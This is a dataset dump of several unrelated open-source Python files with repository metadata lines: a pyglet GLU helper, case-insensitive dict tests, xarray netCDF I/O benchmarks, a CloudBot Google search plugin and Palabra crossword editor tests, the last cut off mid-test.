def get_version(self):
'''Get the current GLU version.
:return: the GLU version
:rtype: str
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return self.version
def have_extension(self, extension):
'''Determine if a GLU extension is available.
:Parameters:
`extension` : str
The name of the extension to test for, including its
``GLU_`` prefix.
:return: True if the extension is provided by the implementation.
:rtype: bool
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return extension in self.extensions
def get_extensions(self):
'''Get a list of available GLU extensions.
:return: a list of the available extensions.
:rtype: list of str
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return self.extensions
# Single instance useful for apps with only a single context (or all contexts
# have same GLU driver, common case).
_glu_info = GLUInfo()
set_active_context = _glu_info.set_active_context
have_version = _glu_info.have_version
get_version = _glu_info.get_version
have_extension = _glu_info.have_extension
get_extensions = _glu_info.get_extensions
| bsd-3-clause | 6,305,670,326,180,828,000 | 34.23125 | 78 | 0.646443 | false |
ltucker/melk.util | tests/test_idict.py | 1 | 1949 | from melk.util.idict import idict
def test_idict():
foo = idict()
foo['bar'] = 'quux'
assert len(foo) == 1
assert foo['bar'] == 'quux'
assert foo['BaR'] == 'quux'
assert 'bar' in foo
assert foo.has_key('bar')
assert 'bAr' in foo
assert foo.has_key('bAr')
assert not 'buhloney' in foo
assert not foo.has_key('bahloney')
foo['BaR'] = 'baz'
assert len(foo) == 1
assert 'bar' in foo
assert foo.has_key('bar')
assert foo['bar'] == 'baz'
del foo['BaR']
assert not 'bar' in foo
assert not foo.has_key('bar')
assert not 'BaR' in foo
assert not foo.has_key('BaR')
def test_idict_init_kw():
foo = idict(Bar='quux', bAz='zoom')
assert 'bar' in foo
assert foo.has_key('bar')
assert foo['bar'] == 'quux'
assert foo['BaR'] == 'quux'
assert 'baz' in foo
assert foo.has_key('baz')
assert foo['baz'] == 'zoom'
assert foo['BaZ'] == 'zoom'
def test_idict_tuple_construct():
foo = idict([('a', 'b'), ('C', 'd')])
assert 'a' in foo
assert foo.has_key('a')
assert 'A' in foo
assert foo.has_key('A')
assert 'c' in foo
assert foo.has_key('c')
assert 'C' in foo
assert foo.has_key('C')
def test_idict_tuple_update():
foo = idict()
foo.update([('a', 'b'), ('C', 'd')])
assert 'a' in foo
assert 'A' in foo
assert 'c' in foo
assert 'C' in foo
def test_idict_new_norm():
class Prefix4(str):
def __hash__(self):
return hash(self[0:4])
def __eq__(self, other):
return self[0:4] == other[0:4]
class PrefixDict(idict):
def __init__(self, *args, **kwargs):
self.Norm = Prefix4
idict.__init__(self, *args, **kwargs)
pd = PrefixDict()
pd['foobia'] = 'bar'
assert 'foobia' in pd
assert 'foobarar' in pd
assert pd['foobsrushinwherebarsfeartotread'] == 'bar'
| gpl-2.0 | 7,594,771,713,812,477,000 | 22.768293 | 57 | 0.539251 | false |
jcmgray/xarray | asv_bench/benchmarks/dataset_io.py | 1 | 15612 | from __future__ import absolute_import, division, print_function
import numpy as np
import pandas as pd
import xarray as xr
from . import randn, randint, requires_dask
try:
import dask
import dask.multiprocessing
except ImportError:
pass
class IOSingleNetCDF(object):
"""
A few examples that benchmark reading/writing a single netCDF file with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self):
# single Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
times = pd.date_range('1970-01-01', periods=self.nt, freq='D')
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
self.ds['foo'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
self.ds['bar'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
self.ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
self.ds.attrs = {'history': 'created for xarray benchmarking'}
self.oinds = {'time': randint(0, self.nt, 120),
'lon': randint(0, self.nx, 20),
'lat': randint(0, self.ny, 10)}
self.vinds = {'time': xr.DataArray(randint(0, self.nt, 120),
dims='x'),
'lon': xr.DataArray(randint(0, self.nx, 120),
dims='x'),
'lat': slice(3, 20)}
class IOWriteSingleNetCDF3(IOSingleNetCDF):
def setup(self):
self.format = 'NETCDF3_64BIT'
self.make_ds()
def time_write_dataset_netcdf4(self):
self.ds.to_netcdf('test_netcdf4_write.nc', engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
self.ds.to_netcdf('test_scipy_write.nc', engine='scipy',
format=self.format)
class IOReadSingleNetCDF4(IOSingleNetCDF):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_dataset(self.filepath, engine='netcdf4').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF3(IOReadSingleNetCDF4):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy(self):
xr.open_dataset(self.filepath, engine='scipy').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF4Dask(IOSingleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_netcdf4_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
class IOReadSingleNetCDF3Dask(IOReadSingleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_scipy_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.time_chunks).load()
class IOMultipleNetCDF(object):
"""
A few examples that benchmark reading/writing multiple netCDF files with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self, nfiles=10):
# multiple Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.nfiles = nfiles
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
self.time_vars = np.split(
pd.date_range('1970-01-01', periods=self.nt, freq='D'),
self.nfiles)
self.ds_list = []
self.filenames_list = []
for i, times in enumerate(self.time_vars):
ds = xr.Dataset()
nt = len(times)
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
ds['foo'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
ds['bar'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
ds.attrs = {'history': 'created for xarray benchmarking'}
self.ds_list.append(ds)
self.filenames_list.append('test_netcdf_%i.nc' % i)
class IOWriteMultipleNetCDF3(IOMultipleNetCDF):
def setup(self):
self.make_ds()
self.format = 'NETCDF3_64BIT'
def time_write_dataset_netcdf4(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
xr.save_mfdataset(self.ds_list, self.filenames_list,
engine='scipy',
format=self.format)
class IOReadMultipleNetCDF4(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4').load()
def time_open_dataset_netcdf4(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4')
class IOReadMultipleNetCDF3(IOReadMultipleNetCDF4):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy').load()
def time_open_dataset_scipy(self):
xr.open_mfdataset(self.filenames_list, engine='scipy')
class IOReadMultipleNetCDF4Dask(IOMultipleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF4'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks).load()
def time_open_dataset_netcdf4_with_block_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.block_chunks)
def time_open_dataset_netcdf4_with_time_chunks(self):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
def time_open_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='netcdf4',
chunks=self.time_chunks)
class IOReadMultipleNetCDF3Dask(IOReadMultipleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.format = 'NETCDF3_64BIT'
xr.save_mfdataset(self.ds_list, self.filenames_list,
format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks).load()
def time_open_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.block_chunks)
def time_open_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_mfdataset(self.filenames_list, engine='scipy',
chunks=self.time_chunks)
| apache-2.0 | 338,617,318,366,091,800 | 37.358722 | 78 | 0.522483 | false |
weylin/CloudBot | plugins/google.py | 3 | 1653 | import random
from cloudbot.util import http, formatting
def api_get(kind, query):
"""Use the RESTful Google Search API"""
url = 'http://ajax.googleapis.com/ajax/services/search/%s?' \
'v=1.0&safe=moderate'
return http.get_json(url % kind, q=query)
# @hook.command("googleimage", "gis", "image")
def googleimage(text):
"""<query> - returns the first google image result for <query>"""
parsed = api_get('images', text)
if not 200 <= parsed['responseStatus'] < 300:
raise IOError('error searching for images: {}: {}'.format(parsed['responseStatus'], ''))
if not parsed['responseData']['results']:
return 'no images found'
return random.choice(parsed['responseData']['results'][:10])['unescapedUrl']
# @hook.command("google", "g", "search")
def google(text):
"""<query> - returns the first google search result for <query>"""
parsed = api_get('web', text)
if not 200 <= parsed['responseStatus'] < 300:
raise IOError('error searching for pages: {}: {}'.format(parsed['responseStatus'], ''))
if not parsed['responseData']['results']:
return 'No results found.'
result = parsed['responseData']['results'][0]
title = http.unescape(result['titleNoFormatting'])
title = formatting.truncate_str(title, 60)
content = http.unescape(result['content'])
if not content:
content = "No description available."
else:
content = http.html.fromstring(content).text_content()
content = formatting.truncate_str(content, 150).replace('\n', '')
return '{} -- \x02{}\x02: "{}"'.format(result['unescapedUrl'], title, content)
| gpl-3.0 | -9,151,805,508,851,293,000 | 34.934783 | 96 | 0.639443 | false |
svisser/palabra | tests/test_editor.py | 1 | 38885 | # This file is part of Palabra
#
# Copyright (C) 2009 - 2011 Simeon Visser
#
# Palabra is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import unittest
import palabralib.cPalabra as cPalabra
from palabralib.grid import Grid
from palabralib.puzzle import Puzzle
import palabralib.constants as constants
import palabralib.editor as editor
import palabralib.word as word
class EditorMockWindow:
def __init__(self):
self.called = 0
def transform_grid(self, transform, **args):
self.called += 1
class EditorTestCase(unittest.TestCase):
def setUp(self):
self.grid = Grid(15, 15)
self.puzzle = Puzzle(self.grid)
self.e_settings = editor.EditorSettings()
self.e_settings.selection = editor.Selection(0, 0, "across")
self.warnings = {}
for w in constants.WARNINGS:
self.warnings[w] = False
cPalabra.preprocess_all()
def testCharSlots(self):
slots = editor.get_char_slots(self.grid, 'K')
self.assertEqual(slots, [])
cells = [(i, i) for i in xrange(5)]
for i, j in cells:
self.grid.set_char(i, j, 'K')
slots = editor.get_char_slots(self.grid, 'K')
self.assertEqual(len(slots), 5)
lengths = [l for x, y, d, l in slots]
self.assertEqual(lengths.count(1), 5)
self.assertEqual([(x, y) for x, y, d, l in slots], cells)
def testLengthSlots(self):
for l in [-1, 0, 14]:
slots = editor.get_length_slots(self.grid, l)
self.assertEqual(slots, [])
slots = editor.get_length_slots(self.grid, 15)
self.assertEqual(len(slots), 30)
for x, y, d, l in slots:
self.assertEqual(l, 15)
self.assertEqual(len([1 for x, y, d, l in slots if d == "across"]), 15)
self.assertEqual(len([1 for x, y, d, l in slots if d == "down"]), 15)
def testOpenSlots(self):
slots = editor.get_open_slots(self.grid)
self.assertEqual(len(slots), len(self.grid.compute_open_squares()))
for x, y, d, l in slots:
self.assertEqual(l, 1)
def testExpandSlots(self):
slots_a = [(0, 0, "across", 5)]
slots_d = [(3, 4, "down", 6)]
exp_a = [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0)]
exp_d = [(3, 4), (3, 5), (3, 6), (3, 7), (3, 8), (3, 9)]
result_a = editor.expand_slots(slots_a)
result_d = editor.expand_slots(slots_d)
self.assertEqual(result_a, exp_a)
self.assertEqual(result_d, exp_d)
self.assertEqual(editor.expand_slots(slots_a + slots_d), exp_a + exp_d)
def testHighlights(self):
"""Clearing the highlights means no cells are highlighted."""
cells = editor.compute_highlights(self.grid, clear=True)
self.assertEqual(cells, [])
def testHighlightsLength(self):
"""Slots can be highlighted by length."""
slots = editor.compute_highlights(self.grid, "length", 15)
self.assertEqual(len(slots), self.grid.count_words())
for s in slots:
self.assertTrue(s[3], 15)
def testHighlightsChar(self):
"""Highlighting a character results in that many slots to highlight."""
for i in xrange(5):
self.grid.set_char(i, i, 'A')
cells = editor.compute_highlights(self.grid, "char", 'A')
self.assertEqual(len(cells), 5)
def testHighlightsOpen(self):
"""All open cells can be highlighted."""
cells = editor.compute_highlights(self.grid, "open")
self.assertEqual(len(cells), len(list(self.grid.cells())))
def testHighlightsTwo(self):
"""Highlighting individual cells results in slots of length 1."""
arg = [(1, 1), (5, 5), (3, 4), (4, 3)]
cells = editor.compute_highlights(self.grid, "cells", arg)
self.assertEqual(len(arg), len(cells))
for x, y in arg:
self.assertTrue((x, y, "across", 1) in cells)
def testHighlightsSlots(self):
result = editor.compute_highlights(self.grid, "slot", (0, 0, "down"))
self.assertTrue((0, 0, "down", 15) in result)
self.grid.set_block(5, 0, True)
result = editor.compute_highlights(self.grid, "slot", (0, 0, "across"))
self.assertTrue((0, 0, "across", 5) in result)
slots = [(0, 0, "across"), (0, 0, "down")]
result = editor.compute_highlights(self.grid, "slots", slots)
self.assertTrue((0, 0, "across", 5) in result)
self.assertTrue((0, 0, "down", 15) in result)
def testSymmetryInvalid(self):
self.assertEqual(editor.apply_symmetry(self.grid, [], -1, -1), [])
def testSymmetryHorizontal(self):
symms = [constants.SYM_HORIZONTAL]
for x in xrange(5):
result = editor.apply_symmetry(self.grid, symms, x, x)
self.assertEqual(result, [(x, self.grid.height - 1 - x)])
self.assertEqual(editor.apply_symmetry(self.grid, symms, 7, 7), [(7, 7)])
def testSymmetryVertical(self):
symms = [constants.SYM_VERTICAL]
for x in xrange(5):
result = editor.apply_symmetry(self.grid, symms, x, x)
self.assertEqual(result, [(self.grid.width - 1 - x, x)])
self.assertEqual(editor.apply_symmetry(self.grid, symms, 7, 7), [(7, 7)])
def _checkSymms(self, result, expect):
for c in expect:
self.assertTrue(c in result)
self.assertEqual(len(result), len(expect))
def testSymmetryTwo(self):
expect = [(0, self.grid.height - 1)
, (self.grid.width - 1, 0)
, (self.grid.width - 1, self.grid.height - 1)]
symms_1 = [constants.SYM_HORIZONTAL, constants.SYM_VERTICAL]
symms_2 = [constants.SYM_90]
self._checkSymms(editor.apply_symmetry(self.grid, symms_1, 0, 0), expect)
self._checkSymms(editor.apply_symmetry(self.grid, symms_2, 0, 0), expect)
def testSymmetryThree(self):
symms = [constants.SYM_90]
for g in [self.grid, Grid(12, 14)]:
result = editor.apply_symmetry(g, symms, 1, 0)
expect = [(g.width - 1, 1)
, (g.width - 2, g.height - 1)
, (0, g.height - 2)]
self._checkSymms(result, expect)
def testSymmetryFour(self):
symms = [constants.SYM_180]
cells = [(0, 0, [(14, 14)]), (5, 5, [(9, 9)])]
for x, y, expect in cells:
self._checkSymms(editor.apply_symmetry(self.grid, symms, x, y), expect)
def testSymmetryFive(self):
symms = [constants.SYM_DIAGONALS]
result = editor.apply_symmetry(self.grid, symms, 1, 0)
self._checkSymms(result, [(0, 1), (14, 13), (13, 14)])
def testTransformBlocks(self):
self.assertEqual(editor.transform_blocks(self.grid, [], -1, -1, True), [])
result = editor.transform_blocks(self.grid, [], 0, 0, True)
self.assertEqual(result, [(0, 0, True)])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 0, 0, True)
self.assertEqual(result, [(0, 0, True), (14, 14, True)])
def testTransformBlocksTwo(self):
self.grid.set_block(0, 0, True)
result = editor.transform_blocks(self.grid, [], 0, 0, True)
self.assertEqual(result, [])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 14, 14, True)
self.assertEqual(result, [(14, 14, True)])
result = editor.transform_blocks(self.grid, [], 0, 0, False)
self.assertEqual(result, [(0, 0, False)])
result = editor.transform_blocks(self.grid, [constants.SYM_180], 14, 14, False)
self.assertEqual(result, [(0, 0, False)])
def testComputeWordCellsNone(self):
o = editor.compute_word_cells(self.grid, None, 0, 0, "across")
self.assertEqual(o, [])
def testComputeWordCellsOne(self):
o = editor.compute_word_cells(self.grid, "palabra", 0, 0, "across")
expect = [(0, 0, 'P'), (1, 0, 'A'), (2, 0, 'L'), (3, 0, 'A'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
def testComputeWordCellsTwo(self):
self.grid.set_char(0, 0, 'P')
self.grid.set_char(3, 0, 'A')
o = editor.compute_word_cells(self.grid, "palabra", 0, 0, "across")
expect = [(1, 0, 'A'), (2, 0, 'L'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
o = editor.compute_word_cells(self.grid, "PALABRA", 0, 0, "across")
expect = [(1, 0, 'A'), (2, 0, 'L'), (4, 0, 'B'), (5, 0, 'R'), (6, 0, 'A')]
self.assertEqual(o, expect)
def testSelection(self):
for i in xrange(self.grid.width):
result = editor.compute_editor_of_cell([(i, 0)], self.puzzle, self.e_settings)
self.assertTrue((i, 0, constants.COLOR_CURRENT_WORD) in result)
if i == 0:
self.assertTrue((i, 0, constants.COLOR_PRIMARY_SELECTION) in result)
def testSelectionTwo(self):
"""Cells behind a block are not part of the selection."""
self.grid.set_block(5, 0, True)
result = editor.compute_editor_of_cell([(6, 0)], self.puzzle, self.e_settings)
self.assertEqual(result, [])
def testSelectionThree(self):
"""Cells behind a void are not part of the selection."""
self.grid.set_void(5, 0, True)
result = editor.compute_editor_of_cell([(6, 0)], self.puzzle, self.e_settings)
self.assertEqual(result, [])
def testCurrentOne(self):
self.e_settings.current = (1, 0)
self.e_settings.settings["symmetries"] = [constants.SYM_180]
result = editor.compute_editor_of_cell([(1, 0)], self.puzzle, self.e_settings)
self.assertTrue((1, 0, constants.COLOR_PRIMARY_ACTIVE) in result)
def testCurrentTwo(self):
self.e_settings.current = (3, 0)
self.e_settings.settings["symmetries"] = [constants.SYM_180]
cells = [(3, 0), (self.grid.width - 4, self.grid.height - 1)]
result = editor.compute_editor_of_cell(cells, self.puzzle, self.e_settings)
self.assertTrue((3, 0, constants.COLOR_PRIMARY_ACTIVE) in result)
cell = (self.grid.width - 4, self.grid.height - 1, constants.COLOR_SECONDARY_ACTIVE)
self.assertTrue(cell in result)
def testWarningsTwoLetterAcross(self):
g = self.grid
g.set_block(2, 0, True)
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((1, 0) in result)
self.assertTrue(len(result) == 2)
def testWarningsTwoLetterDown(self):
g = self.grid
g.set_block(0, 2, True)
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((0, 1) in result)
self.assertTrue(len(result) == 2)
def testWarningsUnchecked(self):
g = self.grid
g.set_block(1, 0, True)
self.warnings[constants.WARN_UNCHECKED] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue(len(result) == 1)
def testWarningsIsolation(self):
g = self.grid
g.set_block(1, 0, True)
g.set_block(0, 1, True)
self.warnings[constants.WARN_UNCHECKED] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue(len(result) == 1)
def testWarningsConsecutive(self):
g = self.grid
g.set_block(1, 0, True)
self.warnings[constants.WARN_CONSECUTIVE] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertEqual(result, [])
g.set_block(1, 1, True)
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((0, 0) in result)
self.assertTrue((0, 1) in result)
self.assertTrue(len(result) == 2)
def testWarningsMultiple(self):
g = self.grid
g.set_block(4, 0, True)
g.set_block(4, 1, True)
g.set_block(3, 2, True)
self.warnings[constants.WARN_UNCHECKED] = True
self.warnings[constants.WARN_CONSECUTIVE] = True
self.warnings[constants.WARN_TWO_LETTER] = True
result = list(editor.compute_warnings_of_cells(g, list(g.cells()), self.warnings))
self.assertTrue((3, 0) in result)
self.assertTrue((3, 1) in result)
self.assertTrue(len(result) == 2)
def testEditorWarnings(self):
self.grid.set_block(2, 0, True)
self.grid.set_block(self.grid.width - 2, 0, True)
self.e_settings.warnings[constants.WARN_UNCHECKED] = True
self.e_settings.warnings[constants.WARN_TWO_LETTER] = True
result = editor.compute_editor_of_cell(list(self.grid.cells()), self.puzzle, self.e_settings)
self.assertTrue((0, 0, constants.COLOR_WARNING) in result)
self.assertTrue((self.grid.width - 1, 0, constants.COLOR_WARNING) in result)
def testComputeSelectionOtherDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, other_dir=True)
self.assertEqual(next[0], s.x)
self.assertEqual(next[1], s.y)
self.assertEqual(next[2], "down")
def testComputeSelectionPos(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=5, y=3)
self.assertEqual(next[0], 5)
self.assertEqual(next[1], 3)
self.assertEqual(next[2], "across")
def testComputeSelectionDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, direction="down")
self.assertEqual(next[0], s.x)
self.assertEqual(next[1], s.y)
self.assertEqual(next[2], "down")
def testComputeSelectionPosDir(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=2, y=7, direction="down")
self.assertEqual(next[0], 2)
self.assertEqual(next[1], 7)
self.assertEqual(next[2], "down")
def testComputeSelectionAlone(self):
s = self.e_settings.selection
next = editor.compute_selection(s, x=2)
self.assertEqual(next[0], 2)
self.assertEqual(next[1], 0)
self.assertEqual(next[2], "across")
next = editor.compute_selection(s, y=2)
self.assertEqual(next[0], 0)
self.assertEqual(next[1], 2)
self.assertEqual(next[2], "across")
def testSearchArgsOne(self):
g = Grid(5, 5)
l, cs, more = editor.compute_search_args(g, (0, 0, "across"))
self.assertEqual(l, 5)
self.assertEqual(cs, [])
self.assertEqual(len(more), 5)
for i in xrange(5):
self.assertEqual(more[i], (0, 5, []))
def testSearchArgsInvalid(self):
"""No search arguments are computed for an invalid cell."""
result = editor.compute_search_args(Grid(5, 5), (-1, -1, "across"), True)
self.assertEqual(result, None)
def testSearchArgsLengthOne(self):
"""No search arguments are computed for a slot of length 1."""
g = Grid(5, 5)
g.set_block(1, 0, True)
result = editor.compute_search_args(g, (0, 0, "across"), True)
self.assertEqual(result, None)
def testSearchArgsFullyFilledIn(self):
"""When a slot is fully filled in, no search arguments are returned."""
g = Grid(5, 5)
g.set_char(0, 0, 'A')
g.set_char(1, 0, 'A')
g.set_char(2, 0, 'A')
g.set_char(3, 0, 'A')
g.set_char(4, 0, 'A')
result = editor.compute_search_args(g, (0, 0, "across"), False)
self.assertEqual(result, None)
l, cs, more = editor.compute_search_args(g, (0, 0, "across"), True)
self.assertEqual(l, 5)
self.assertEqual(len(cs), 5)
self.assertEqual(len(more), 5)
def testAttemptFill(self):
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["koala"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["koala", "steam"])
self.assertEqual(g2.count_chars(include_blanks=False), 10)
cPalabra.postprocess()
def testAttemptFillDoesNotFit(self):
g = Grid(5, 5)
g2 = editor.attempt_fill(g, ["doesnotfit"])
self.assertEqual(g, g2)
cPalabra.postprocess()
def testAttemptFillIntersect(self):
g = Grid(3, 3)
g.set_block(1, 1, True)
g.set_block(2, 2, True)
g2 = editor.attempt_fill(g, ["foo", "fix"])
self.assertEqual(g2.count_chars(include_blanks=False), 5)
cPalabra.postprocess()
def testAttemptFillIntersectTwo(self):
# A B C
# D F
# E H G
words = ["abc", "ade", "cfg", "ehg"]
g = Grid(3, 3)
